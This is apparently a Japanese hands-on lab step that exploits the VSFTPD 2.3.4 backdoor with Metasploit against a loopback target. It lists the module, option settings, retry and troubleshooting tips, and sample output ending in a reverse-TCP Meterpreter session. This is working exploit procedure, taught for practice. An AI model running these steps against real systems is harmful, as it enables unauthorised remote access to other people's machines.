初期アクセスの獲得
このステップでは、VSFTPD 2.3.4 サービスのバックドアを悪用してターゲットシステムへのアクセス権を獲得します。これにより、ポストエクスプロイトのための Meterpreter セッションが得られます。
まず、Metasploit Framework コンソールを起動します。
msfconsole -q
Metasploit が起動したら、VSFTPD 2.3.4 バックドア用のエクスプロイトを選択します。
use exploit/unix/ftp/vsftpd_234_backdoor
次に、ターゲットとペイロードのオプションを設定します。サービスは同一マシン上で実行されているため、ループバック IP を使用します。デフォルトのペイロードは LHOST を必要とし、「All encoders failed to encode」というエラーで失敗する可能性があるため、エンコーダーを設定してこれを回避します。
set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set Encoder generic/none
最後に、エクスプロイトを実行します。
exploit
トラブルシューティング: Msf::OptionValidateError One or more options failed to validate: LHOST と表示された場合は、set LHOST 127.0.0.1 を実行してください。「All encoders failed to encode」と表示された場合は、set Encoder generic/none を実行してください。その後、再度 exploit を実行します。
警告: 最初の試行で「Unable to connect to backdoor on 6200/TCP. Cooldown?」や「Exploit completed, but no session was created.」というエラーが出て失敗することがあります。その場合は、単に exploit コマンドをもう一度実行してください。2 回目の試行で成功するはずです。
成功すると、Meterpreter セッション(セッション 1)が開かれます。
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >
これで Meterpreter セッションが確立されました。次のステップのために msf > プロンプトに戻るには、Ctrl+Z を押し、続いて「Background session 1?」と聞かれたら y を入力します。